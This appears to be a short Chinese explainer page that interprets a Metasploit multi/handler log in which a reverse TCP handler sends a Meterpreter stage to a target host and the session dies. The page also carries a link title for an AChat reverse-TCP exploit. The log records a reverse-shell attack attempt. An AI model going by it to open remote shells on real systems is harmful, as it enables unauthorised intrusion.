msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.1.108:4567 [*] Sending stage (77780 bytes) to 192.168.1.102 [*] - Meterpreter session 2 closed. Reason: Died
时间: 2024-02-12 17:03:15 浏览: 274
achat_reverse_tcp_exploit:在AChat 0.150 Beta 7 Windows 7810 x86x64上测试
这是一个 Metasploit 框架下的 exploit(multi/handler) 模块的运行结果。根据输出信息可以看出,Metasploit 成功启动了一个反向 TCP handler,监听本地 IP 地址为 192.168.1.108,端口号为 4567。接着,Metasploit 发送了一个大小为 77780 字节的 payload 到 IP 地址为 192.168.1.102 的目标主机。但是,Meterpreter 会话 2 在执行过程中异常退出,具体原因可能是目标主机上的防火墙或杀毒软件拦截了 payload 或者 exploit 中出现了 bug。
阅读全文